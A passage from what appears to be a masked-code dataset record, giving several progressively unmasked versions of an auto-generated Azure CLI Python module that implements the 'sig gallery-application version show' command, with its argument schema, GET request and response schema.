AAZStrType(\n serialized_name='storageAccountType')\n publishing_profile.target_extended_locations = AAZListType(\n serialized_name='targetExtendedLocations')\n publishing_profile.target_regions = AAZListType(serialized_name\n ='targetRegions')\n advanced_settings = (cls._schema_on_200.properties.\n publishing_profile.advanced_settings)\n advanced_settings.Element = AAZStrType()\n manage_actions = (cls._schema_on_200.properties.\n publishing_profile.manage_actions)\n manage_actions.install = AAZStrType(flags={'required': True})\n manage_actions.remove = AAZStrType(flags={'required': True})\n manage_actions.update = AAZStrType()\n settings = (cls._schema_on_200.properties.publishing_profile.\n settings)\n settings.config_file_name = AAZStrType(serialized_name=\n 'configFileName')\n settings.package_file_name = AAZStrType(serialized_name=\n 'packageFileName')\n source = cls._schema_on_200.properties.publishing_profile.source\n source.default_configuration_link = AAZStrType(serialized_name=\n 'defaultConfigurationLink')\n source.media_link = AAZStrType(serialized_name='mediaLink',\n flags={'required': True})\n target_extended_locations = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations)\n target_extended_locations.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_extended_locations.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.extended_location = AAZObjectType(serialized_name=\n 'extendedLocation')\n _element.extended_location_replica_count = AAZIntType(\n serialized_name='extendedLocationReplicaCount')\n _element.name = AAZStrType()\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n extended_location = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations.Element.\n extended_location)\n extended_location.name = AAZStrType()\n extended_location.type = AAZStrType()\n target_regions = (cls._schema_on_200.properties.\n publishing_profile.target_regions)\n target_regions.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_regions.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.name = AAZStrType(flags={'required': True})\n _element.regional_replica_count = AAZIntType(serialized_name=\n 'regionalReplicaCount')\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n replication_status = (cls._schema_on_200.properties.\n replication_status)\n replication_status.aggregated_state = AAZStrType(serialized_name\n ='aggregatedState', flags={'read_only': True})\n replication_status.summary = AAZListType(flags={'read_only': True})\n summary = cls._schema_on_200.properties.replication_status.summary\n summary.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.replication_status.\n summary.Element)\n _element.details = AAZStrType(flags={'read_only': True})\n _element.progress = AAZIntType(flags={'read_only': True})\n _element.region = AAZStrType(flags={'read_only': True})\n _element.state = AAZStrType(flags={'read_only': True})\n tags = cls._schema_on_200.tags\n tags.Element = AAZStrType()\n return cls._schema_on_200\n\n\nclass _ShowHelper:\n \"\"\"Helper class for Show\"\"\"\n _schema_encryption_images_read = None\n\n @classmethod\n def _build_schema_encryption_images_read(cls, _schema):\n if cls._schema_encryption_images_read is not None:\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n return\n (cls._schema_encryption_images_read) = (_schema_encryption_images_read\n ) = AAZObjectType()\n encryption_images_read = _schema_encryption_images_read\n encryption_images_read.data_disk_images = AAZListType(serialized_name\n ='dataDiskImages')\n encryption_images_read.os_disk_image = AAZObjectType(serialized_name\n ='osDiskImage')\n data_disk_images = _schema_encryption_images_read.data_disk_images\n data_disk_images.Element = AAZObjectType()\n _element = _schema_encryption_images_read.data_disk_images.Element\n _element.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n _element.lun = AAZIntType(flags={'required': True})\n os_disk_image = _schema_encryption_images_read.os_disk_image\n os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n os_disk_image.security_profile = AAZObjectType(serialized_name=\n 'securityProfile')\n security_profile = (_schema_encryption_images_read.os_disk_image.\n security_profile)\n security_profile.confidential_vm_encryption_type = AAZStrType(\n serialized_name='confidentialVMEncryptionType')\n security_profile.secure_vm_disk_encryption_set_id = AAZStrType(\n serialized_name='secureVMDiskEncryptionSetId')\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@register_command('sig gallery-application version show')\nclass Show(AAZCommand):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n _args_schema = cls._args_schema\n _args_schema.gallery_application_name = AAZStrArg(options=[\n '--application-name', '--gallery-application-name'], help=\n 'The name of the gallery application.', required=True, id_part=\n 'child_name_1')\n _args_schema.gallery_application_version_name = AAZStrArg(options=[\n '-n', '--name', '--version-name',\n '--gallery-application-version-name'], help=\n 'The name of the gallery application version.', required=True,\n id_part='child_name_2')\n _args_schema.gallery_name = AAZStrArg(options=['-r',\n '--gallery-name'], help='Gallery name.', required=True, id_part\n ='name')\n _args_schema.resource_group = AAZResourceGroupNameArg(help=\n 'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'\n , required=True)\n _args_schema.expand = AAZStrArg(options=['--expand'], help=\n 'The expand expression to apply on the operation. \"ReplicationStatus\" Default value is None.'\n , enum={'ReplicationStatus': 'ReplicationStatus'})\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n self.GalleryApplicationVersionsGet(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n <mask token>\n <mask token>\n\n\n class GalleryApplicationVersionsGet(AAZHttpOperation):\n CLIENT_TYPE = 'MgmtClient'\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=\n False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'\n , **self.url_parameters)\n\n @property\n def method(self):\n return 'GET'\n\n @property\n def error_format(self):\n return 'ODataV4Format'\n\n @property\n def url_parameters(self):\n parameters = {**self.serialize_url_param(\n 'galleryApplicationName', self.ctx.args.\n gallery_application_name, required=True), **self.\n serialize_url_param('galleryApplicationVersionName', self.\n ctx.args.gallery_application_version_name, required=True),\n **self.serialize_url_param('galleryName', self.ctx.args.\n gallery_name, required=True), **self.serialize_url_param(\n 'resourceGroupName', self.ctx.args.resource_group, required\n =True), **self.serialize_url_param('subscriptionId', self.\n ctx.subscription_id, required=True)}\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {**self.serialize_query_param('$expand', self.ctx.\n args.expand), **self.serialize_query_param('api-version',\n '2022-01-03', required=True)}\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {**self.serialize_header_param('Accept',\n 'application/json')}\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var('instance', data, schema_builder=self.\n _build_schema_on_200)\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n cls._schema_on_200 = AAZObjectType()\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(flags={'read_only': True})\n _schema_on_200.location = AAZStrType(flags={'required': True})\n _schema_on_200.name = AAZStrType(flags={'read_only': True})\n _schema_on_200.properties = AAZObjectType(flags={\n 'client_flatten': True})\n _schema_on_200.tags = AAZDictType()\n _schema_on_200.type = AAZStrType(flags={'read_only': True})\n properties = cls._schema_on_200.properties\n properties.provisioning_state = AAZStrType(serialized_name=\n 'provisioningState', flags={'read_only': True})\n properties.publishing_profile = AAZObjectType(serialized_name=\n 'publishingProfile', flags={'required': True})\n properties.replication_status = AAZObjectType(serialized_name=\n 'replicationStatus')\n publishing_profile = (cls._schema_on_200.properties.\n publishing_profile)\n publishing_profile.advanced_settings = AAZDictType(serialized_name\n ='advancedSettings')\n publishing_profile.enable_health_check = AAZBoolType(\n serialized_name='enableHealthCheck')\n publishing_profile.end_of_life_date = AAZStrType(serialized_name\n ='endOfLifeDate')\n publishing_profile.exclude_from_latest = AAZBoolType(\n serialized_name='excludeFromLatest')\n publishing_profile.manage_actions = AAZObjectType(serialized_name\n ='manageActions')\n publishing_profile.published_date = AAZStrType(serialized_name=\n 'publishedDate', flags={'read_only': True})\n publishing_profile.replica_count = AAZIntType(serialized_name=\n 'replicaCount')\n publishing_profile.replication_mode = AAZStrType(serialized_name\n ='replicationMode')\n publishing_profile.settings = AAZObjectType()\n publishing_profile.source = AAZObjectType(flags={'required': True})\n publishing_profile.storage_account_type = AAZStrType(\n serialized_name='storageAccountType')\n publishing_profile.target_extended_locations = AAZListType(\n serialized_name='targetExtendedLocations')\n publishing_profile.target_regions = AAZListType(serialized_name\n ='targetRegions')\n advanced_settings = (cls._schema_on_200.properties.\n publishing_profile.advanced_settings)\n advanced_settings.Element = AAZStrType()\n manage_actions = (cls._schema_on_200.properties.\n publishing_profile.manage_actions)\n manage_actions.install = AAZStrType(flags={'required': True})\n manage_actions.remove = AAZStrType(flags={'required': True})\n manage_actions.update = AAZStrType()\n settings = (cls._schema_on_200.properties.publishing_profile.\n settings)\n settings.config_file_name = AAZStrType(serialized_name=\n 'configFileName')\n settings.package_file_name = AAZStrType(serialized_name=\n 'packageFileName')\n source = cls._schema_on_200.properties.publishing_profile.source\n source.default_configuration_link = AAZStrType(serialized_name=\n 'defaultConfigurationLink')\n source.media_link = AAZStrType(serialized_name='mediaLink',\n flags={'required': True})\n target_extended_locations = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations)\n target_extended_locations.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_extended_locations.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.extended_location = AAZObjectType(serialized_name=\n 'extendedLocation')\n _element.extended_location_replica_count = AAZIntType(\n serialized_name='extendedLocationReplicaCount')\n _element.name = AAZStrType()\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n extended_location = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations.Element.\n extended_location)\n extended_location.name = AAZStrType()\n extended_location.type = AAZStrType()\n target_regions = (cls._schema_on_200.properties.\n publishing_profile.target_regions)\n target_regions.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_regions.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.name = AAZStrType(flags={'required': True})\n _element.regional_replica_count = AAZIntType(serialized_name=\n 'regionalReplicaCount')\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n replication_status = (cls._schema_on_200.properties.\n replication_status)\n replication_status.aggregated_state = AAZStrType(serialized_name\n ='aggregatedState', flags={'read_only': True})\n replication_status.summary = AAZListType(flags={'read_only': True})\n summary = cls._schema_on_200.properties.replication_status.summary\n summary.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.replication_status.\n summary.Element)\n _element.details = AAZStrType(flags={'read_only': True})\n _element.progress = AAZIntType(flags={'read_only': True})\n _element.region = AAZStrType(flags={'read_only': True})\n _element.state = AAZStrType(flags={'read_only': True})\n tags = cls._schema_on_200.tags\n tags.Element = AAZStrType()\n return cls._schema_on_200\n\n\nclass _ShowHelper:\n \"\"\"Helper class for Show\"\"\"\n _schema_encryption_images_read = None\n\n @classmethod\n def _build_schema_encryption_images_read(cls, _schema):\n if cls._schema_encryption_images_read is not None:\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n return\n (cls._schema_encryption_images_read) = (_schema_encryption_images_read\n ) = AAZObjectType()\n encryption_images_read = _schema_encryption_images_read\n encryption_images_read.data_disk_images = AAZListType(serialized_name\n ='dataDiskImages')\n encryption_images_read.os_disk_image = AAZObjectType(serialized_name\n ='osDiskImage')\n data_disk_images = _schema_encryption_images_read.data_disk_images\n data_disk_images.Element = AAZObjectType()\n _element = _schema_encryption_images_read.data_disk_images.Element\n _element.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n _element.lun = AAZIntType(flags={'required': True})\n os_disk_image = _schema_encryption_images_read.os_disk_image\n os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n os_disk_image.security_profile = AAZObjectType(serialized_name=\n 'securityProfile')\n security_profile = (_schema_encryption_images_read.os_disk_image.\n security_profile)\n security_profile.confidential_vm_encryption_type = AAZStrType(\n serialized_name='confidentialVMEncryptionType')\n security_profile.secure_vm_disk_encryption_set_id = AAZStrType(\n serialized_name='secureVMDiskEncryptionSetId')\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@register_command('sig gallery-application version show')\nclass Show(AAZCommand):\n <mask token>\n <mask token>\n\n def _handler(self, command_args):\n super()._handler(command_args)\n self._execute_operations()\n return self._output()\n <mask token>\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n _args_schema = cls._args_schema\n _args_schema.gallery_application_name = AAZStrArg(options=[\n '--application-name', '--gallery-application-name'], help=\n 'The name of the gallery application.', required=True, id_part=\n 'child_name_1')\n _args_schema.gallery_application_version_name = AAZStrArg(options=[\n '-n', '--name', '--version-name',\n '--gallery-application-version-name'], help=\n 'The name of the gallery application version.', required=True,\n id_part='child_name_2')\n _args_schema.gallery_name = AAZStrArg(options=['-r',\n '--gallery-name'], help='Gallery name.', required=True, id_part\n ='name')\n _args_schema.resource_group = AAZResourceGroupNameArg(help=\n 'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'\n , required=True)\n _args_schema.expand = AAZStrArg(options=['--expand'], help=\n 'The expand expression to apply on the operation. \"ReplicationStatus\" Default value is None.'\n , enum={'ReplicationStatus': 'ReplicationStatus'})\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n self.GalleryApplicationVersionsGet(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n <mask token>\n <mask token>\n\n\n class GalleryApplicationVersionsGet(AAZHttpOperation):\n CLIENT_TYPE = 'MgmtClient'\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=\n False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'\n , **self.url_parameters)\n\n @property\n def method(self):\n return 'GET'\n\n @property\n def error_format(self):\n return 'ODataV4Format'\n\n @property\n def url_parameters(self):\n parameters = {**self.serialize_url_param(\n 'galleryApplicationName', self.ctx.args.\n gallery_application_name, required=True), **self.\n serialize_url_param('galleryApplicationVersionName', self.\n ctx.args.gallery_application_version_name, required=True),\n **self.serialize_url_param('galleryName', self.ctx.args.\n gallery_name, required=True), **self.serialize_url_param(\n 'resourceGroupName', self.ctx.args.resource_group, required\n =True), **self.serialize_url_param('subscriptionId', self.\n ctx.subscription_id, required=True)}\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {**self.serialize_query_param('$expand', self.ctx.\n args.expand), **self.serialize_query_param('api-version',\n '2022-01-03', required=True)}\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {**self.serialize_header_param('Accept',\n 'application/json')}\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var('instance', data, schema_builder=self.\n _build_schema_on_200)\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n cls._schema_on_200 = AAZObjectType()\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(flags={'read_only': True})\n _schema_on_200.location = AAZStrType(flags={'required': True})\n _schema_on_200.name = AAZStrType(flags={'read_only': True})\n _schema_on_200.properties = AAZObjectType(flags={\n 'client_flatten': True})\n _schema_on_200.tags = AAZDictType()\n _schema_on_200.type = AAZStrType(flags={'read_only': True})\n properties = cls._schema_on_200.properties\n properties.provisioning_state = AAZStrType(serialized_name=\n 'provisioningState', flags={'read_only': True})\n properties.publishing_profile = AAZObjectType(serialized_name=\n 'publishingProfile', flags={'required': True})\n properties.replication_status = AAZObjectType(serialized_name=\n 'replicationStatus')\n publishing_profile = (cls._schema_on_200.properties.\n publishing_profile)\n publishing_profile.advanced_settings = AAZDictType(serialized_name\n ='advancedSettings')\n publishing_profile.enable_health_check = AAZBoolType(\n serialized_name='enableHealthCheck')\n publishing_profile.end_of_life_date = AAZStrType(serialized_name\n ='endOfLifeDate')\n publishing_profile.exclude_from_latest = AAZBoolType(\n serialized_name='excludeFromLatest')\n publishing_profile.manage_actions = AAZObjectType(serialized_name\n ='manageActions')\n publishing_profile.published_date = AAZStrType(serialized_name=\n 'publishedDate', flags={'read_only': True})\n publishing_profile.replica_count = AAZIntType(serialized_name=\n 'replicaCount')\n publishing_profile.replication_mode = AAZStrType(serialized_name\n ='replicationMode')\n publishing_profile.settings = AAZObjectType()\n publishing_profile.source = AAZObjectType(flags={'required': True})\n publishing_profile.storage_account_type = AAZStrType(\n serialized_name='storageAccountType')\n publishing_profile.target_extended_locations = AAZListType(\n serialized_name='targetExtendedLocations')\n publishing_profile.target_regions = AAZListType(serialized_name\n ='targetRegions')\n advanced_settings = (cls._schema_on_200.properties.\n publishing_profile.advanced_settings)\n advanced_settings.Element = AAZStrType()\n manage_actions = (cls._schema_on_200.properties.\n publishing_profile.manage_actions)\n manage_actions.install = AAZStrType(flags={'required': True})\n manage_actions.remove = AAZStrType(flags={'required': True})\n manage_actions.update = AAZStrType()\n settings = (cls._schema_on_200.properties.publishing_profile.\n settings)\n settings.config_file_name = AAZStrType(serialized_name=\n 'configFileName')\n settings.package_file_name = AAZStrType(serialized_name=\n 'packageFileName')\n source = cls._schema_on_200.properties.publishing_profile.source\n source.default_configuration_link = AAZStrType(serialized_name=\n 'defaultConfigurationLink')\n source.media_link = AAZStrType(serialized_name='mediaLink',\n flags={'required': True})\n target_extended_locations = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations)\n target_extended_locations.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_extended_locations.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.extended_location = AAZObjectType(serialized_name=\n 'extendedLocation')\n _element.extended_location_replica_count = AAZIntType(\n serialized_name='extendedLocationReplicaCount')\n _element.name = AAZStrType()\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n extended_location = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations.Element.\n extended_location)\n extended_location.name = AAZStrType()\n extended_location.type = AAZStrType()\n target_regions = (cls._schema_on_200.properties.\n publishing_profile.target_regions)\n target_regions.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_regions.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.name = AAZStrType(flags={'required': True})\n _element.regional_replica_count = AAZIntType(serialized_name=\n 'regionalReplicaCount')\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n replication_status = (cls._schema_on_200.properties.\n replication_status)\n replication_status.aggregated_state = AAZStrType(serialized_name\n ='aggregatedState', flags={'read_only': True})\n replication_status.summary = AAZListType(flags={'read_only': True})\n summary = cls._schema_on_200.properties.replication_status.summary\n summary.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.replication_status.\n summary.Element)\n _element.details = AAZStrType(flags={'read_only': True})\n _element.progress = AAZIntType(flags={'read_only': True})\n _element.region = AAZStrType(flags={'read_only': True})\n _element.state = AAZStrType(flags={'read_only': True})\n tags = cls._schema_on_200.tags\n tags.Element = AAZStrType()\n return cls._schema_on_200\n\n\nclass _ShowHelper:\n \"\"\"Helper class for Show\"\"\"\n _schema_encryption_images_read = None\n\n @classmethod\n def _build_schema_encryption_images_read(cls, _schema):\n if cls._schema_encryption_images_read is not None:\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n return\n (cls._schema_encryption_images_read) = (_schema_encryption_images_read\n ) = AAZObjectType()\n encryption_images_read = _schema_encryption_images_read\n encryption_images_read.data_disk_images = AAZListType(serialized_name\n ='dataDiskImages')\n encryption_images_read.os_disk_image = AAZObjectType(serialized_name\n ='osDiskImage')\n data_disk_images = _schema_encryption_images_read.data_disk_images\n data_disk_images.Element = AAZObjectType()\n _element = _schema_encryption_images_read.data_disk_images.Element\n _element.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n _element.lun = AAZIntType(flags={'required': True})\n os_disk_image = _schema_encryption_images_read.os_disk_image\n os_disk_image.disk_encryption_set_id = AAZStrType(serialized_name=\n 'diskEncryptionSetId')\n os_disk_image.security_profile = AAZObjectType(serialized_name=\n 'securityProfile')\n security_profile = (_schema_encryption_images_read.os_disk_image.\n security_profile)\n security_profile.confidential_vm_encryption_type = AAZStrType(\n serialized_name='confidentialVMEncryptionType')\n security_profile.secure_vm_disk_encryption_set_id = AAZStrType(\n serialized_name='secureVMDiskEncryptionSetId')\n _schema.data_disk_images = (cls._schema_encryption_images_read.\n data_disk_images)\n _schema.os_disk_image = (cls._schema_encryption_images_read.\n os_disk_image)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\n@register_command('sig gallery-application version show')\nclass Show(AAZCommand):\n <mask token>\n <mask token>\n\n def _handler(self, command_args):\n super()._handler(command_args)\n self._execute_operations()\n return self._output()\n <mask token>\n\n @classmethod\n def _build_arguments_schema(cls, *args, **kwargs):\n if cls._args_schema is not None:\n return cls._args_schema\n cls._args_schema = super()._build_arguments_schema(*args, **kwargs)\n _args_schema = cls._args_schema\n _args_schema.gallery_application_name = AAZStrArg(options=[\n '--application-name', '--gallery-application-name'], help=\n 'The name of the gallery application.', required=True, id_part=\n 'child_name_1')\n _args_schema.gallery_application_version_name = AAZStrArg(options=[\n '-n', '--name', '--version-name',\n '--gallery-application-version-name'], help=\n 'The name of the gallery application version.', required=True,\n id_part='child_name_2')\n _args_schema.gallery_name = AAZStrArg(options=['-r',\n '--gallery-name'], help='Gallery name.', required=True, id_part\n ='name')\n _args_schema.resource_group = AAZResourceGroupNameArg(help=\n 'Name of resource group. You can configure the default group using `az configure --defaults group=<name>`.'\n , required=True)\n _args_schema.expand = AAZStrArg(options=['--expand'], help=\n 'The expand expression to apply on the operation. \"ReplicationStatus\" Default value is None.'\n , enum={'ReplicationStatus': 'ReplicationStatus'})\n return cls._args_schema\n\n def _execute_operations(self):\n self.pre_operations()\n self.GalleryApplicationVersionsGet(ctx=self.ctx)()\n self.post_operations()\n\n @register_callback\n def pre_operations(self):\n pass\n <mask token>\n\n def _output(self, *args, **kwargs):\n result = self.deserialize_output(self.ctx.vars.instance,\n client_flatten=True)\n return result\n\n\n class GalleryApplicationVersionsGet(AAZHttpOperation):\n CLIENT_TYPE = 'MgmtClient'\n\n def __call__(self, *args, **kwargs):\n request = self.make_request()\n session = self.client.send_request(request=request, stream=\n False, **kwargs)\n if session.http_response.status_code in [200]:\n return self.on_200(session)\n return self.on_error(session.http_response)\n\n @property\n def url(self):\n return self.client.format_url(\n '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/galleries/{galleryName}/applications/{galleryApplicationName}/versions/{galleryApplicationVersionName}'\n , **self.url_parameters)\n\n @property\n def method(self):\n return 'GET'\n\n @property\n def error_format(self):\n return 'ODataV4Format'\n\n @property\n def url_parameters(self):\n parameters = {**self.serialize_url_param(\n 'galleryApplicationName', self.ctx.args.\n gallery_application_name, required=True), **self.\n serialize_url_param('galleryApplicationVersionName', self.\n ctx.args.gallery_application_version_name, required=True),\n **self.serialize_url_param('galleryName', self.ctx.args.\n gallery_name, required=True), **self.serialize_url_param(\n 'resourceGroupName', self.ctx.args.resource_group, required\n =True), **self.serialize_url_param('subscriptionId', self.\n ctx.subscription_id, required=True)}\n return parameters\n\n @property\n def query_parameters(self):\n parameters = {**self.serialize_query_param('$expand', self.ctx.\n args.expand), **self.serialize_query_param('api-version',\n '2022-01-03', required=True)}\n return parameters\n\n @property\n def header_parameters(self):\n parameters = {**self.serialize_header_param('Accept',\n 'application/json')}\n return parameters\n\n def on_200(self, session):\n data = self.deserialize_http_content(session)\n self.ctx.set_var('instance', data, schema_builder=self.\n _build_schema_on_200)\n _schema_on_200 = None\n\n @classmethod\n def _build_schema_on_200(cls):\n if cls._schema_on_200 is not None:\n return cls._schema_on_200\n cls._schema_on_200 = AAZObjectType()\n _schema_on_200 = cls._schema_on_200\n _schema_on_200.id = AAZStrType(flags={'read_only': True})\n _schema_on_200.location = AAZStrType(flags={'required': True})\n _schema_on_200.name = AAZStrType(flags={'read_only': True})\n _schema_on_200.properties = AAZObjectType(flags={\n 'client_flatten': True})\n _schema_on_200.tags = AAZDictType()\n _schema_on_200.type = AAZStrType(flags={'read_only': True})\n properties = cls._schema_on_200.properties\n properties.provisioning_state = AAZStrType(serialized_name=\n 'provisioningState', flags={'read_only': True})\n properties.publishing_profile = AAZObjectType(serialized_name=\n 'publishingProfile', flags={'required': True})\n properties.replication_status = AAZObjectType(serialized_name=\n 'replicationStatus')\n publishing_profile = (cls._schema_on_200.properties.\n publishing_profile)\n publishing_profile.advanced_settings = AAZDictType(serialized_name\n ='advancedSettings')\n publishing_profile.enable_health_check = AAZBoolType(\n serialized_name='enableHealthCheck')\n publishing_profile.end_of_life_date = AAZStrType(serialized_name\n ='endOfLifeDate')\n publishing_profile.exclude_from_latest = AAZBoolType(\n serialized_name='excludeFromLatest')\n publishing_profile.manage_actions = AAZObjectType(serialized_name\n ='manageActions')\n publishing_profile.published_date = AAZStrType(serialized_name=\n 'publishedDate', flags={'read_only': True})\n publishing_profile.replica_count = AAZIntType(serialized_name=\n 'replicaCount')\n publishing_profile.replication_mode = AAZStrType(serialized_name\n ='replicationMode')\n publishing_profile.settings = AAZObjectType()\n publishing_profile.source = AAZObjectType(flags={'required': True})\n publishing_profile.storage_account_type = AAZStrType(\n serialized_name='storageAccountType')\n publishing_profile.target_extended_locations = AAZListType(\n serialized_name='targetExtendedLocations')\n publishing_profile.target_regions = AAZListType(serialized_name\n ='targetRegions')\n advanced_settings = (cls._schema_on_200.properties.\n publishing_profile.advanced_settings)\n advanced_settings.Element = AAZStrType()\n manage_actions = (cls._schema_on_200.properties.\n publishing_profile.manage_actions)\n manage_actions.install = AAZStrType(flags={'required': True})\n manage_actions.remove = AAZStrType(flags={'required': True})\n manage_actions.update = AAZStrType()\n settings = (cls._schema_on_200.properties.publishing_profile.\n settings)\n settings.config_file_name = AAZStrType(serialized_name=\n 'configFileName')\n settings.package_file_name = AAZStrType(serialized_name=\n 'packageFileName')\n source = cls._schema_on_200.properties.publishing_profile.source\n source.default_configuration_link = AAZStrType(serialized_name=\n 'defaultConfigurationLink')\n source.media_link = AAZStrType(serialized_name='mediaLink',\n flags={'required': True})\n target_extended_locations = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations)\n target_extended_locations.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_extended_locations.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.extended_location = AAZObjectType(serialized_name=\n 'extendedLocation')\n _element.extended_location_replica_count = AAZIntType(\n serialized_name='extendedLocationReplicaCount')\n _element.name = AAZStrType()\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n extended_location = (cls._schema_on_200.properties.\n publishing_profile.target_extended_locations.Element.\n extended_location)\n extended_location.name = AAZStrType()\n extended_location.type = AAZStrType()\n target_regions = (cls._schema_on_200.properties.\n publishing_profile.target_regions)\n target_regions.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.publishing_profile.\n target_regions.Element)\n _element.encryption = AAZObjectType()\n _ShowHelper._build_schema_encryption_images_read(_element.\n encryption)\n _element.name = AAZStrType(flags={'required': True})\n _element.regional_replica_count = AAZIntType(serialized_name=\n 'regionalReplicaCount')\n _element.storage_account_type = AAZStrType(serialized_name=\n 'storageAccountType')\n replication_status = (cls._schema_on_200.properties.\n replication_status)\n replication_status.aggregated_state = AAZStrType(serialized_name\n ='aggregatedState', flags={'read_only': True})\n replication_status.summary = AAZListType(flags={'read_only': True})\n summary = cls._schema_on_200.properties.replication_status.summary\n summary.Element = AAZObjectType()\n _element = (cls._schema_on_200.properties.replication_status.\n summary.Element)\n _element.details = AAZStrType(flags={'read_only': True})\n _element.progress = AAZIntType(flags={'read_only': True})\n _element.region = AAZStrType(flags={'read_only': True})\n _element.state = AAZStrType(flags={'read_only': True})\n tags = cls._schema_on_200.tags\n tags.Element = AAZStrType()\n return cls._schema_on_200\n\n\nclass _ShowHelper:\n \"\"\"Helper class for Show\"\"\"\n _schema_encryption_images_read = None\n\n 